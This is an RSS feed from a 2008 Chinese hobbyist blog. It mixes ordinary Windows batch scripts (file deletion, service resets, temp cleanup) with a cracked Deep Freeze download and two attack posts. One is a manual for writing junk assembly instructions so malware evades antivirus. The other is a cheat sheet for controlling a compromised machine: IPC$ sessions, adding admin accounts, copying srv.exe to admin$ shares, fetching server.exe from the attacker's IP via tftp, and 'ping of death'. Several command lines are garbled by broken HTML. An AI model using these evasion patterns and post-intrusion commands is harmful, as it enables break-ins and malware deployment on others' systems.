<?xml version="1.0" encoding="GB2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[☆破誶D!μ]]></title>
<link>http://xuliang.bokemx.com/index.html</link>
<description><![CDATA[☆破誶D!μ]]></description>
<item>
<title><![CDATA[顽固文件删除工具]]></title>
<link>http://xuliang.bokemx.com/200873121529.html</link>
<description><![CDATA[<P>将以下代码保存为BAT文件....把需要删除的文件拖放到BAT文件的图标上既可删除</P>
<P>DEL /F /A /Q <A href="http://www.bokemx.com/metalred821227/file://%3F/%251">\\?\%1</A><BR>RD /S /Q <A href="http://www.bokemx.com/metalred821227/file://%3F/%251">\\?\%1</A></P>]]></description>
<author>xuliang</author>
<pubDate>2008-7-31 21:52:00</pubDate>
</item>
<item>
<title><![CDATA[还原WINXP默认服务状态.BAT]]></title>
<link>http://xuliang.bokemx.com/200873121514.html</link>
<description><![CDATA[sc config&nbsp;&nbsp; Alerter start= DISABLED <BR>sc config&nbsp;&nbsp; ALG start= DEMAND <BR>sc config&nbsp;&nbsp; AppMgmt start= DEMAND <BR>sc config&nbsp;&nbsp; AudioSrv start= AUTO <BR>sc config&nbsp;&nbsp; BITS start= DEMAND <BR>sc config&nbsp;&nbsp; Browser start= AUTO <BR>sc config&nbsp;&nbsp; CiSvc start= DEMAND <BR>sc config&nbsp;&nbsp; ClipSrv start= DISABLED <BR>sc config&nbsp;&nbsp; COMSysApp start= DEMAND <BR>sc config&nbsp;&nbsp; CryptSvc start= AUTO <BR>sc config&nbsp;&nbsp; DcomLaunch start= AUTO <BR>sc config&nbsp;&nbsp; Dhcp start= AUTO <BR>sc config&nbsp;&nbsp; dmadmin start= DEMAND <BR>sc config&nbsp;&nbsp; dmserver start= AUTO <BR>sc config&nbsp;&nbsp; Dnscache start= AUTO <BR>sc config&nbsp;&nbsp; ERSvc start= AUTO <BR>sc config&nbsp;&nbsp; Eventlog start= AUTO <BR>sc config&nbsp;&nbsp; EventSystem start= DEMAND <BR>sc config&nbsp;&nbsp; FastUserSwitchingCompatibility start= DEMAND <BR>sc config&nbsp;&nbsp; helpsvc start= AUTO <BR>sc config&nbsp;&nbsp; HidServ start= DISABLED <BR>sc config&nbsp;&nbsp; HTTPFilter start= DEMAND <BR>sc config&nbsp;&nbsp; ImapiService start= DEMAND <BR>sc config&nbsp;&nbsp; lanmanserver start= AUTO <BR>sc config&nbsp;&nbsp; lanmanworkstation start= AUTO <BR>sc config&nbsp;&nbsp; LmHosts start= AUTO <BR>sc config&nbsp;&nbsp; Messenger start= DISABLED <BR>sc config&nbsp;&nbsp; mnmsrvc start= DEMAND <BR>sc config&nbsp;&nbsp; MSDTC start= DEMAND <BR>sc config&nbsp;&nbsp; MSIServer start= DEMAND <BR>sc config&nbsp;&nbsp; NetDDE start= DISABLED <BR>sc config&nbsp;&nbsp; NetDDEdsdm start= DISABLED <BR>sc config&nbsp;&nbsp; Netlogon start= DEMAND <BR>sc config&nbsp;&nbsp; Netman start= DEMAND <BR>sc config&nbsp;&nbsp; Nla start= DEMAND <BR>sc config&nbsp;&nbsp; NtLmSsp start= DEMAND <BR>sc config&nbsp;&nbsp; NtmsSvc start= DEMAND <BR>sc config&nbsp;&nbsp; PlugPlay start= AUTO <BR>sc config&nbsp;&nbsp; PolicyAgent start= AUTO <BR>sc config&nbsp;&nbsp; ProtectedStorage start= AUTO <BR>sc config&nbsp;&nbsp; RasAuto start= DEMAND <BR>sc config&nbsp;&nbsp; RasMan start= DEMAND <BR>sc config&nbsp;&nbsp; RDSessMgr start= DEMAND <BR>sc config&nbsp;&nbsp; RemoteAccess start= DISABLED <BR>sc config&nbsp;&nbsp; RemoteRegistry start= AUTO <BR>sc config&nbsp;&nbsp; RpcLocator start= DEMAND <BR>sc config&nbsp;&nbsp; RpcSs start= AUTO <BR>sc config&nbsp;&nbsp; RSVP start= DEMAND <BR>sc config&nbsp;&nbsp; SamSs start= AUTO <BR>sc config&nbsp;&nbsp; SCardSvr start= DEMAND <BR>sc config&nbsp;&nbsp; Schedule start= AUTO <BR>sc config&nbsp;&nbsp; seclogon start= AUTO <BR>sc config&nbsp;&nbsp; SENS start= AUTO <BR>sc config&nbsp;&nbsp; SharedAccess start= AUTO <BR>sc config&nbsp;&nbsp; ShellHWDetection start= AUTO <BR>sc config&nbsp;&nbsp; Spooler start= AUTO <BR>sc config&nbsp;&nbsp; srservice start= DISABLED <BR>sc config&nbsp;&nbsp; SSDPSRV start= DEMAND <BR>sc config&nbsp;&nbsp; stisvc start= DEMAND <BR>sc config&nbsp;&nbsp; SwPrv start= DEMAND <BR>sc config&nbsp;&nbsp; SysmonLog start= DEMAND <BR>sc config&nbsp;&nbsp; TapiSrv start= DEMAND <BR>sc config&nbsp;&nbsp; TermService start= DEMAND <BR>sc config&nbsp;&nbsp; Themes start= AUTO <BR>sc config&nbsp;&nbsp; TlntSvr start= DISABLED <BR>sc config&nbsp;&nbsp; TrkWks start= AUTO <BR>sc config&nbsp;&nbsp; UMWdf start= DEMAND <BR>sc config&nbsp;&nbsp; upnphost start= DEMAND <BR>sc config&nbsp;&nbsp; UPS start= DEMAND <BR>sc config&nbsp;&nbsp; VSS start= DEMAND <BR>sc config&nbsp;&nbsp; W32Time start= AUTO <BR>sc config&nbsp;&nbsp; WebClient start= AUTO <BR>sc config&nbsp;&nbsp; winmgmt start= AUTO <BR>sc config&nbsp;&nbsp; WmdmPmSN start= DEMAND <BR>sc config&nbsp;&nbsp; Wmi start= DEMAND <BR>sc config&nbsp;&nbsp; WmiApSrv start= DEMAND <BR>sc config&nbsp;&nbsp; wscsvc start= AUTO <BR>sc config&nbsp;&nbsp; wuauserv start= AUTO <BR>sc config&nbsp;&nbsp; WZCSVC start= AUTO <BR>sc config&nbsp;&nbsp; xmlprov start= DEMAND]]></description>
<author>xuliang</author>
<pubDate>2008-7-31 21:51:00</pubDate>
</item>
<item>
<title><![CDATA[一键清理系统垃圾文件.bat]]></title>
<link>http://xuliang.bokemx.com/2008731214951.html</link>
<description><![CDATA[@echo off<BR>pause<BR>echo 正在清理系统垃圾文件，请稍等......<BR>del /f /s /q %systemdrive%\*.tmp<BR>del /f /s /q %systemdrive%\*._mp<BR>del /f /s /q %systemdrive%\*.log<BR>del /f /s /q %systemdrive%\*.gid<BR>del /f /s /q %systemdrive%\*.chk<BR>del /f /s /q %systemdrive%\*.old<BR>del /f /s /q %systemdrive%\recycled\*.*<BR>del /f /s /q %windir%\*.bak<BR>del /f /s /q %windir%\prefetch\*.*<BR>rd /s /q %windir%\temp &amp; md %windir%\temp<BR>del /f /q %userprofile%\cookies\*.*<BR>del /f /q %userprofile%\recent\*.*<BR>del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"<BR>del /f /s /q "%userprofile%\Local Settings\Temp\*.*"<BR>del /f /s /q "%userprofile%\recent\*.*"<BR>echo 清理系统垃圾完成！<BR>echo. &amp; pause <BR>]]></description>
<author>xuliang</author>
<pubDate>2008-7-31 21:49:00</pubDate>
</item>
<item>
<title><![CDATA[自动改回主页BAT]]></title>
<link>http://xuliang.bokemx.com/2008731214820.html</link>
<description><![CDATA[reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d <A href="http://www.wode114.com">http://www.wode114.com</A> /f <BR>reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d <A href="http://www.wode114.com">http://www.wode114.com</A> /f <BR>pause]]></description>
<author>xuliang</author>
<pubDate>2008-7-31 21:48:00</pubDate>
</item>
<item>
<title><![CDATA[冰点_还原精灵]]></title>
<link>http://xuliang.bokemx.com/2008731204951.html</link>
<description><![CDATA[<P><FONT size=2>冰点还原破解中文版<BR>冰点还原教程(使用和删除冰点)<BR>一、冰点的安装<BR>1、只能安装在win2000和xp两个系统下，其它系统不支持。<BR>2、安装时注意选择保护的硬盘……#此前在首页部分显示#<BR>3、进入系统后软件呼出热键为&nbsp;ctrl+AIt+shift+F6&nbsp;也可以按住shift的同时鼠标双击任务图标打开，打<BR><BR>开后可设定密码，默认密码为空<BR>4、主界面有三个选项：<BR>(1)第一个为保护状态,即每次启动恢复所保护的硬盘。<BR>(2)第二个为自由选项，比如系统正在被保护状态，我们选第二个选项，默认为1，这个1是指机器重新启<BR><BR>动后的一次为不保护状态，当机器在次重起后，自动转到保护状态，那么在重起后我们所做的操作在第二<BR><BR>次机器重起时就会被自动被保护起来。<BR>(3)第三个为不还原状态,重启后冰点图表会不停的闪动红X，就是放弃了所有保护的硬盘，这时候运行冰<BR><BR>点安装程序可以删除冰点。<BR>二、冰点的删除<BR>1、按ctrl+AIt+shift+F6呼出界面，如果你没修改，密码为空，进入软件设置界面。<BR>2、选择第三项，即放弃保护，计算机重启。<BR>3、重启后冰点图标闪烁红x，说明冰点已经没有保护硬盘了。<BR>4、运行冰点原程序，会出现删除选项，点击删除......&nbsp;&nbsp;<BR>可以保护您的硬盘免受病毒侵害，重新恢复删除或覆盖的文件，彻底清除安装失败的程序，并避免由于系<BR><BR>统死机带来的数据丢失等问题。只需简单的几步安装，即可安全地保护您的硬盘数据。还原精灵的安装不<BR><BR>会影响硬盘分区和操作系统。轻松安装、动态保护、实时瞬间恢复&nbsp;<BR><BR>适合网吧和个人用，直接安装就可以，卸载：ctrl+AIt+shift+F6然后输入安装密码就可以，卸载后重新<BR><BR>启动生效，完全卸载就反安装一下<BR>下载后直接安装，默认提供的&nbsp;C&nbsp;D&nbsp;E&nbsp;三个盘为保护，可以根据自己的要求来设置，启动软件&nbsp;<BR><BR>ctrl+AIt+shift+F6&nbsp;设置密码&nbsp;<BR>三个选项，第一个为保护状态&nbsp;第二个为自由选项，第三个为不还原状态&nbsp;<BR>比如系统正在被保护状态，我们选第二个选项，默认为&nbsp;1&nbsp;这个1是指机器重新启动后的一次为不保护状态<BR><BR>，当机器在次重起后，自动转到保护状态，那么在重起后我们所做的操作在第二次机器重起时就会被自动<BR><BR>被保护起来，第三个不保护状态选择后就不用介绍了吧：）&nbsp;<BR>当你看到&nbsp;冰点图表在不停的闪动&nbsp;红X的时候&nbsp;就是不在保护状态，这时要注意你的设置了！</FONT></P>
<P><FONT size=2>下载地址:</FONT><A href="http://down.cngr.cn/200705/deepfreezn.rar"><FONT size=2>http://down.cngr.cn/200705/deepfreezn.rar</FONT></A></P>]]></description>
<author>xuliang</author>
<pubDate>2008-7-31 20:49:00</pubDate>
</item>
<item>
<title><![CDATA[【免杀花指令编写手册】-基础篇]]></title>
<link>http://xuliang.bokemx.com/200824202025.html</link>
<description><![CDATA[<FONT face=黑体 color=#0000ff>
<P><FONT color=#eeeeee size=2>一.花指令概念:<BR><BR>花指令是一堆汇编指令组成,对于程序来说,是一堆废话,加不加花指令都<BR><BR>不影响程序的正常运行.编写的花指令要终始保持堆栈的平衡<BR><BR>二.写花指令的原则:<BR><BR>写花指令的基本原则就是要保持堆栈的平衡.<BR><BR>写花指令细细品味下面一段比喻:&nbsp;<BR><BR>我们把一段花指令比喻成一道数学运算题,把汇编指令(push&nbsp;pop等)比喻成加减<BR>乘除,把寄存器或</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT color=#eeeeee size=2>数据</FONT></A><FONT color=#eeeeee size=2>(eax,ebx,1等)比喻成<BR>数字(1,2,3等),那么要保持花指令堆栈的平衡,等于保持这道数学题的结果是0&nbsp;.<BR><BR>三.解释一些指令含意<BR><BR>push&nbsp;ebp&nbsp;----把基址指针寄存器压入堆栈<BR><BR>pop&nbsp;&nbsp;ebp&nbsp;----把基址指针寄存器弹出堆栈<BR><BR><BR>push&nbsp;eax&nbsp;----把</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT color=#eeeeee size=2>数据</FONT></A><FONT color=#eeeeee size=2>寄存器压入堆栈</FONT></P>
<P><FONT color=#eeeeee size=2>pop&nbsp;&nbsp;eax&nbsp;----把</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT color=#eeeeee size=2>数据</FONT></A><FONT color=#eeeeee size=2>寄存器弹出堆栈<BR><BR>nop&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-----不执行<BR><BR>add&nbsp;esp,1-----指针寄存器加1<BR><BR>sub&nbsp;esp,1-----指针寄存器减1<BR><BR>inc&nbsp;ecx&nbsp;&nbsp;-----计数器加1<BR><BR>dec&nbsp;ecx&nbsp;&nbsp;-----计数器减1<BR><BR>sub&nbsp;esp,1&nbsp;----指针寄存器加1<BR><BR>sub&nbsp;esp,-1----指针寄存器加-1<BR><BR>jmp&nbsp;入口地址----跳到程序入口地址<BR><BR>push&nbsp;入口地址---把入口地址压入堆栈<BR><BR>retn&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;------&nbsp;反回到入口地址,效果与jmp&nbsp;入口地址一样.<BR><BR>mov&nbsp;eax,入口地址&nbsp;------把入口地址转送到</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT color=#eeeeee size=2>数据</FONT></A><FONT size=2><FONT color=#eeeeee>寄存器中.&nbsp;&nbsp;<BR><BR>jmp&nbsp;eax&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-----&nbsp;跳到程序入口地址&nbsp;&nbsp;<BR><BR>jb&nbsp;入口地址<BR><BR>jnb&nbsp;入口地址&nbsp;&nbsp;------效果和jmp&nbsp;入口地址一样,直接跳到程序入口地址.<BR><BR>四.免杀花指令编写手册:<BR><BR>注:以后编写花指令,都可以参考本手册,灵活组合,快速写出自己的花指令.<BR><BR>*******************************************************************<BR>push&nbsp;ebp<BR><BR>pop&nbsp;ebp<BR><BR>push&nbsp;eax<BR><BR>pop&nbsp;eax<BR><BR>push&nbsp;esp<BR><BR>pop&nbsp;esp<BR><BR>push&nbsp;0<BR><BR>push&nbsp;0<BR><BR>push&nbsp;10&nbsp;&nbsp;-------其中数字可以任意,注意与下面对应<BR><BR>push&nbsp;-10<BR><BR>nop&nbsp;&nbsp;-----------可任意在中间添加<BR><BR>move&nbsp;edi,edi&nbsp;----效果与nop一样<BR><BR>add&nbsp;esp,1&nbsp;&nbsp;-------其中数字可以任意,注意以下面对应<BR><BR>add&nbsp;esp,-1<BR><BR>add&nbsp;esp,1&nbsp;&nbsp;--------其中数字可以任意,注意以下面对应<BR><BR>sub&nbsp;esp,1&nbsp;<BR><BR>inc&nbsp;ecx<BR><BR>dec&nbsp;ecx<BR><BR>sub&nbsp;eax,&nbsp;-2&nbsp;----------其中数字可任意,与inc的个数对应<BR><BR>inc&nbsp;eax<BR><BR>inc&nbsp;eax<BR><BR>add&nbsp;eax&nbsp;-2&nbsp;----------其中数字可任意,与inc的个数对应<BR><BR>inc&nbsp;eax<BR><BR>inc&nbsp;eax<BR><BR>jmp&nbsp;下一个jmp地址<BR><BR>jmp&nbsp;下一个地址<BR><BR>push&nbsp;ebp<BR><BR>mov&nbsp;ebp,esp&nbsp;-------可做为花指令的开头句<BR><BR>jmp&nbsp;入口地址&nbsp;&nbsp;------跳到程序入口地址<BR><BR>与它效果一样的还有(以下三个):<BR><BR>push&nbsp;入口地址<BR><BR>retn<BR><BR>jb&nbsp;&nbsp;入口地址<BR><BR>jnb&nbsp;入口地址<BR><BR>mov&nbsp;eax,入口地址<BR><BR>jmp&nbsp;eax<BR><BR>********************************************************************<BR>五.分析一段简单的花指令:<BR>push&nbsp;eax<BR><BR>push&nbsp;eax<BR><BR>nop<BR><BR>pop&nbsp;eax<BR><BR>pop&nbsp;eax<BR><BR>sub&nbsp;eax,1<BR><BR>inc&nbsp;eax<BR><BR>push&nbsp;入口地址<BR><BR>retn</FONT>&nbsp;</FONT></P></FONT>]]></description>
<author>xuliang</author>
<pubDate>2008-2-4 20:20:00</pubDate>
</item>
<item>
<title><![CDATA[3389得肉鸡后命令全集]]></title>
<link>http://xuliang.bokemx.com/200824201816.html</link>
<description><![CDATA[<P><FONT face=黑体 color=#eeeeee size=2>net&nbsp;use&nbsp;$"&gt;\\ip\ipc$Content$nbsp;"&nbsp;"&nbsp;/user:"&nbsp;"&nbsp;建立IPC空链接&nbsp; <BR>net&nbsp;use&nbsp;$"&gt;\\ip\ipc$Content$nbsp;"密码"&nbsp;/user:"用户名"&nbsp;建立IPC非空链接&nbsp; <BR>net&nbsp;use&nbsp;h:&nbsp;$"&gt;\\ip\c$Content$nbsp;"密码"&nbsp;/user:"用户名"&nbsp;直接登陆后映射对方C：到本地为H:&nbsp; <BR>net&nbsp;use&nbsp;h:&nbsp;$"&gt;\\ip\c$Content$nbsp;登陆后映射对方C：到本地为H:&nbsp; <BR>net&nbsp;use&nbsp;$"&gt;\\ip\ipc$Content$nbsp;/del&nbsp;删除IPC链接&nbsp; <BR>net&nbsp;use&nbsp;h:&nbsp;/del&nbsp;删除映射对方到本地的为H:的映射&nbsp; <BR>net&nbsp;user&nbsp;用户名&nbsp;密码&nbsp;/add&nbsp;建立用户&nbsp; <BR>net&nbsp;user&nbsp;guest&nbsp;/active:yes&nbsp;激活guest用户&nbsp; <BR>net&nbsp;user&nbsp;查看有哪些用户&nbsp; <BR>net&nbsp;user&nbsp;帐户名&nbsp;查看帐户的属性&nbsp; <BR>net&nbsp;localgroup&nbsp;administrators&nbsp;用户名&nbsp;/add&nbsp;把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数&nbsp; <BR>net&nbsp;start&nbsp;查看开启了哪些</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>&nbsp; <BR>net&nbsp;start&nbsp;</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>名&nbsp;开启</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>；(如:net&nbsp;start&nbsp;telnet，&nbsp;net&nbsp;start&nbsp;schedule)&nbsp; <BR>net&nbsp;stop&nbsp;</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>名&nbsp;停止某</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>&nbsp; <BR>net&nbsp;time&nbsp;\\目标ip&nbsp;查看对方时间&nbsp; <BR>net&nbsp;time&nbsp;\\目标ip&nbsp;/set&nbsp;设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息&nbsp; <BR>net&nbsp;view&nbsp;查看本地局域网内开启了哪些共享&nbsp; <BR>net&nbsp;view&nbsp;\\ip&nbsp;查看对方局域网内开启了哪些共享&nbsp; <BR>net&nbsp;config&nbsp;显示系统</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>网络</FONT></A><FONT face=黑体 color=#eeeeee size=2>设置&nbsp; <BR>net&nbsp;logoff&nbsp;断开连接的共享&nbsp; <BR>net&nbsp;pause&nbsp;</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>名&nbsp;暂停某</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>&nbsp; <BR>net&nbsp;send&nbsp;ip&nbsp;"文本信息"&nbsp;向对方发信息&nbsp; <BR>net&nbsp;ver&nbsp;局域网内正在使用的</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>网络</FONT></A><FONT face=黑体 color=#eeeeee size=2>连接类型和信息&nbsp; <BR>net&nbsp;share&nbsp;查看本地开启的共享&nbsp; <BR>net&nbsp;share&nbsp;ipc$Content$nbsp;开启ipc$共享&nbsp; <BR>net&nbsp;share&nbsp;ipc$Content$nbsp;/del&nbsp;删除ipc$共享&nbsp; <BR>net&nbsp;share&nbsp;c$Content$nbsp;/del&nbsp;删除C：共享&nbsp; <BR>net&nbsp;user&nbsp;guest&nbsp;12345&nbsp;用guest用户登陆后用将密码改为12345&nbsp; <BR>net&nbsp;password&nbsp;密码&nbsp;更改系统登陆密码&nbsp; <BR>netstat&nbsp;-a&nbsp;查看开启了哪些端口,常用netstat&nbsp;-an&nbsp; <BR>netstat&nbsp;-n&nbsp;查看端口的</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>网络</FONT></A><FONT face=黑体 color=#eeeeee size=2>连接情况，常用netstat&nbsp;-an&nbsp; <BR>netstat&nbsp;-v&nbsp;查看正在进行的工作&nbsp; <BR>netstat&nbsp;-p&nbsp;协议名&nbsp;例：netstat&nbsp;-p&nbsp;tcq/ip&nbsp;查看某协议使用情况（查看tcp/ip协议使用情况）&nbsp; <BR>netstat&nbsp;-s&nbsp;查看正在使用的所有协议使用情况&nbsp; <BR>nbtstat&nbsp;-A&nbsp;ip&nbsp;对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写&nbsp; <BR>tracert&nbsp;-参数&nbsp;ip(或计算机名)&nbsp;跟踪路由（</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>数据</FONT></A><FONT face=黑体 color=#eeeeee size=2>包），参数：“-w数字”用于设置超时间隔。&nbsp; <BR>ping&nbsp;ip(或</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>域名</FONT></A><FONT face=黑体 color=#eeeeee size=2>)&nbsp;向对方主机发送默认大小为32字节的</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>数据</FONT></A><FONT face=黑体 color=#eeeeee size=2>，参数：“-l[空格]</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>数据</FONT></A><FONT face=黑体 color=#eeeeee size=2>包大小”；“-n发送</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>数据</FONT></A><FONT face=黑体 color=#eeeeee size=2>次数”；“-t”指一直ping。&nbsp; <BR>ping&nbsp;-t&nbsp;-l&nbsp;65550&nbsp;ip&nbsp;死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)&nbsp; <BR>ipconfig&nbsp;(winipcfg)&nbsp;用于windows&nbsp;NT及XP(windows&nbsp;95&nbsp;98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息&nbsp; <BR>tlist&nbsp;-t&nbsp;以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)&nbsp; <BR>kill&nbsp;-F&nbsp;进程名&nbsp;加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)&nbsp; <BR>del&nbsp;-F&nbsp;文件名&nbsp;加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR&nbsp;*.*”表示删除当前目录下所有只读文件，“DEL/A-S&nbsp;*.*”表示删除当前目录下除系统文件以外的所有文件&nbsp; <BR>del&nbsp;/S&nbsp;/Q&nbsp;目录&nbsp;或用：rmdir&nbsp;/s&nbsp;/Q&nbsp;目录&nbsp;/S删除目录及目录下的所有子目录和文件。同时使用参数/Q&nbsp;可取消删除操作时的系统确认就直接删除。（二个命令作用相同）&nbsp; <BR>move&nbsp;盘符\路径\要移动的文件名&nbsp;存放移动文件的路径\移动后文件名&nbsp;移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖&nbsp; <BR>fc&nbsp;one.txt&nbsp;two.txt&nbsp;&gt;&nbsp;3st.txt&nbsp;对比二个文件并把不同之处输出到3st.txt文件中，"&gt;&nbsp;"和"&gt;&nbsp;&gt;"&nbsp;是重定向命令&nbsp; <BR>at&nbsp;id号&nbsp;开启已注册的某个计划任务&nbsp; <BR>at&nbsp;/delete&nbsp;停止所有计划任务，用参数/yes则不需要确认就直接停止&nbsp; <BR>at&nbsp;id号&nbsp;/delete&nbsp;停止某个已注册的计划任务&nbsp; <BR>at&nbsp;查看所有的计划任务&nbsp; <BR>at&nbsp;\\ip&nbsp;time&nbsp;程序名(或一个命令)&nbsp;/r&nbsp;在某时间运行对方某程序并重新启动计算机&nbsp; <BR>finger&nbsp;username&nbsp;@host&nbsp;查看最近有哪些用户登陆&nbsp; <BR>telnet&nbsp;ip&nbsp;端口&nbsp;远和登陆</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>器,默认端口为23&nbsp; <BR>open&nbsp;ip&nbsp;连接到IP（属telnet登陆后的命令）&nbsp; <BR>telnet&nbsp;在本机上直接键入telnet&nbsp;将进入本机的telnet&nbsp; <BR>copy&nbsp;路径\文件名1&nbsp;路径\文件名2&nbsp;/y&nbsp;复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件&nbsp; <BR>copy&nbsp;c:\srv.exe&nbsp;$"&gt;\\ip\admin$Content$nbsp;复制本地c:\srv.exe到对方的admin下&nbsp; <BR>cppy&nbsp;1st.jpg/b+2st.txt/a&nbsp;3st.jpg&nbsp;将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件&nbsp; <BR>copy&nbsp;$\svv.exe"&gt;\\ip\admin$\svv.exe&nbsp;c:\&nbsp;或:copy\\ip\admin$\*.*&nbsp;复制对方admini$共享下的srv.exe文件（所有文件）至本地C：&nbsp; <BR>xcopy&nbsp;要复制的文件或目录树&nbsp;目标地址\目录名&nbsp;复制文件和目录树，用参数/Y将不提示覆盖相同文件&nbsp; <BR>tftp&nbsp;-i&nbsp;自己IP(用肉机作跳板时这用肉机IP)&nbsp;get&nbsp;server.exe&nbsp;c:\server.exe&nbsp;登陆后，将“IP”的server.exe下载到目标主机c:\server.exe&nbsp;参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i&nbsp;则以ASCII模式（传送文本文件模式）进行传送&nbsp; <BR>tftp&nbsp;-i&nbsp;对方IP&nbsp;put&nbsp;c:\server.exe&nbsp;登陆后，上传本地c:\server.exe至主机&nbsp; <BR>ftp&nbsp;ip&nbsp;端口&nbsp;用于上传文件至</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)</FONT></P>
<P><FONT face=黑体 color=#eeeeee size=2>route&nbsp;print&nbsp;显示出IP路由，将主要显示</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>网络</FONT></A><FONT face=黑体 color=#eeeeee size=2>地址Network&nbsp;addres，子网掩码Netmask，网关地址Gateway&nbsp;addres，接口地址Interface&nbsp; <BR>arp&nbsp;查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp&nbsp;-a将显示出全部信息&nbsp; <BR>start&nbsp;程序名或命令&nbsp;/max&nbsp;或/min&nbsp;新开一个新窗口并最大化（最小化）运行某程序或命令&nbsp; <BR>mem&nbsp;查看cpu使用情况&nbsp; <BR>attrib&nbsp;文件名(目录名)&nbsp;查看某文件（目录）的属性&nbsp; <BR>attrib&nbsp;文件名&nbsp;-A&nbsp;-R&nbsp;-S&nbsp;-H&nbsp;或&nbsp;+A&nbsp;+R&nbsp;+S&nbsp;+H&nbsp;去掉(添加)某文件的&nbsp;存档，只读，系统，隐藏&nbsp;属性；用＋则是添加为某属性&nbsp; <BR>dir&nbsp;查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间&nbsp; <BR>date&nbsp;/t&nbsp;、&nbsp;time&nbsp;/t&nbsp;使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间&nbsp; <BR>set&nbsp;指定环境变量名称=要指派给变量的字符&nbsp;设置环境变量&nbsp; <BR>set&nbsp;显示当前所有的环境变量&nbsp; <BR>set&nbsp;p(或其它字符)&nbsp;显示出当前以字符p(或其它字符)开头的所有环境变量&nbsp; <BR>pause&nbsp;暂停批处理程序，并显示出：请按任意键继续....&nbsp; <BR>if&nbsp;在批处理程序中执行条件处理（更多说明见if命令及变量）&nbsp; <BR>goto&nbsp;标签&nbsp;将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）&nbsp; <BR>call&nbsp;路径\批处理文件名&nbsp;从批处理程序中调用另一个批处理程序&nbsp;（更多说明见call&nbsp;/?）&nbsp; <BR>for&nbsp;对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）&nbsp; <BR>echo&nbsp;on或off&nbsp;打开或关闭echo，仅用echo不加参数则显示当前echo设置&nbsp; <BR>echo&nbsp;信息&nbsp;在屏幕上显示出信息&nbsp; <BR>echo&nbsp;信息&nbsp;&gt;&gt;&nbsp;pass.txt&nbsp;将"信息"保存到pass.txt文件中&nbsp; <BR>findstr&nbsp;"Hello"&nbsp;aa.txt&nbsp;在aa.txt文件中寻找字符串hello&nbsp; <BR>find&nbsp;文件名&nbsp;查找某文件&nbsp; 